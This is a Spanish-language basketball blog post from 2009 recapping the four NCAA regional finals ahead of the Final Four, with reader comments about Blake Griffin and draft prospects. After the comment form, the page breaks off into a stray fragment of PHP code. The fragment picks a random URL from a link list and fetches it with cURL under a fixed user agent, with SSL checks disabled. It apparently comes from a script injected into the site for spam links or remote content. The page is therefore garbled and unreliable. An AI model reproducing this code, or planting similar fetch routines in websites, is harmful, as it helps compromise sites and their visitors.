NCAA: Ya tenemos Final Four

30 de March de 2009 por Viva_Dirk

Connecticut VS Michigan State y North Carolina VS Villanova serán los partidos que se disputen el sábado 4 de abril en la Final Four de la NCAA de 2009. Veamos como les fue el último paso que les ha traído hasta aquí.

Connecticut VS Missouri: Gran actuación del sexto hombre de los Huskies Kemba Walker con 23 puntos, 5 rebotes, 5 asistencias, una serie de 7 de 9 en tiros de campo y 9 de 10 en tiros libres. Walker es un freshman de talento y desparpajo que ha gozado ya de 25 minutos por encuentros en uno de los mejores equipos del país. Hay que seguirlo de cerca. UConn dominó bajo los tableros, con Thabbet a la cabeza, capturando 19 rebotes más que su rival y tuvo un mayor acierto en el tiro y en los libres, pero estuvo a punto de dejarse ir el partido con las 17 pérdidas de balón que cometieron frente a las 6 de su rival. Los Tigers hicieron su juego de bloque pero eso no bastó para tumbar a uno de los colosos de la competición.

Pittsburgh VS Villanova: El grupo de ‘veteranos’ de Villanova si fue suficiente para tumbar a otro de los favoritos (aunque menos que UConn). De la mano de los seniors Anderson&Cunningham y del junior Reynols, los Wildcats se llevaron el partido frente a las grandes actuaciones de las estrellas de los Panthers. Los 3 nombrados sumaron 46 puntos y 13 rebotes, mientras que la pareja Blair&Young se iba a los 48 puntos y 17 rebotes. La diferencia mas notable estuvo en el 10 de 24 que consiguieron el resto de los Panthers frente al 6 de 26 de los otros 6 jugadores de Pittsburgh.

Michigan State VS Louisville: Impresionante la defensa de Michigan State que consiguió maniatar de manera espectacular a los Cardinals de Pittino. Sin ningun jugador que figure actualmente en primera ronda de ningun mock, los Spartans dejaron en un 38% de acierto a su rival, y si quitamos la actuación de Clark, el resto de sus compañeros solo pudieron acertar en 10 de los 30 tiros que intentaron. La decepción fue Williams por parte de Louisville que se quedó en 5 puntos con un 1 de 7. Por parte de Michigan State el mejor fue Goran Suton con 19 puntos, 10 rebotes y 4 asistencias.

North Carolina VS Oklahoma: El título de este partido podria haber sido ‘2’ pues al igual que los 300 espartanos cayeron con honor ante el gran ejercito persa, Griffin y Warren cayeron ante los Tar Heels sin remedio alguno. Griffin cumplió con su papel de mejor jugador universitario del pais y Nº1 del próximo draft, 23 puntos y 16 rebotes con un 9 de 12 en tiros ,pasando por encima de Hansbrough, mientras que Warren, aunque fallón desde la larga distancia, se fue hasta los 18 puntos. El resto del equipo sumó 19. En UNC con Tyler tratando de frenar a Griffin sin exito, fueron Lawson y Green los que se apoderaron del partido con 19 puntos el primero y 18 el segundo. El base además capturó 5 rebotes y repartió 5 asistencias.

Una vez llegados a este punto, todo lo que no sea una final Huskies VS Tar Heels será una gran sorpresa. Todos estamos esperando ver a Thabeet contra Hansbrough y a las dos mejores plantillas del país frente a frente.

Comenta

6 comentarios a esta entrada

  1. Landrusski dice:
    #1

    Gracias por colgar informacion de la NCAA cracks!!!!que aunke no e visto nada de nada me interesa bastante,sabeis como puedo ver algun partido de la final four?por cierto os hago una pregunta es tan bueno blake griffin como dicen?a kien se asemeja de la NBA?y decirme algun que otro que no aparezca en altos puestos en mocks pero que considerais que puede llegar a ser un “robo” gracias cracks

      Citar

  2. Dantley2 dice:
    #2

    Tiene mucho mérito Missouri, el partido anterior lo ganaron a 100 puntos, y a Louisville lo mataron defendiendo.

    El partido de Vilanova con Pittsburgh fue caótico. La canasta final de Reynolds, horrible todo el partido, es un resumen perfecto: entrada a lo loco que metió casi de churro y falta de experiencia del defensor que podría haber forzado la falta de ataque. Pero eso sí, adrenalina a tope.

    Y qué sólo está Griffin, pero bueno, ya su siguiente partido será en un equipo NBA. North Carolina no necesitó ni a Hansbrough.

    Landrusski, Griffin no es tan fácil de clasificar, pero quizá Boozer que es la comparación que más sale por ahí es buena. Eso sí, Griffin es más físico. A mí me parece muy bueno, en el draft del año pasado creo que habría estado por debajo de Rose y Beasley, pese a que ahora ya hay dudas sobre Beasley. Hace tiempo que un número 1 del draft no está tan claro.

    ¿Robos? Todavía queda para ver cómo se perfila el draft, porque algunos irán subiendo. Mullens en teoría se esperaba más de él, ahora mismo no está claro pero podría ser un robo si se lo lleva alguien con una 20 o incluso más atrás. Jerome Jordan un center muy verde quizá. No sé, el draft viene regular este año.

      Citar

  3. Viva_Dirk dice:
    #3

    Landrusski, el tema de robos del draft y eso lo comentaremos cuando llegue el draft, viendo en que posiciones eligen y quienes se presentan finalmente.

    En cuanto a Griffin, yo mas que un Boozer lo veo un Jamison, con mucho mas físico y sin tiro de 3.

      Citar

  4. Landrusski dice:
    #4

    Gracias cracks….esperare pues el post del draft 🙂

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Joer Viva,,un Jamison con más físico y sin tiro de 3 ¿sigue siendo un Jamison?

      Citar

  6. Viva_Dirk dice:
    #6

    Esta semana estan dando en el digital las últimas rondas, hoy han dado el Oklahoma VS Syracuse y ayer el UConn VS Purdue. Creo definitivamente que va a ser un draft de bases, mas aun si se presenta Ricky desde luego

    No me habia fijado demasiado en Price pero dió un grandísimo nivel, y a Flynn si le habia prestado mas atención otras veces y me gusta bastante.

    Bases que se presenten ahora mismo de cierto nivel: Ricky, Jennings, Teague, Flynn, Price, Lawson, Curry y Maynor. Salvo Price todos los demás apuntan a top-20 y no me sorprenderia que si hace una buena Final Four también estuviese ahí.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>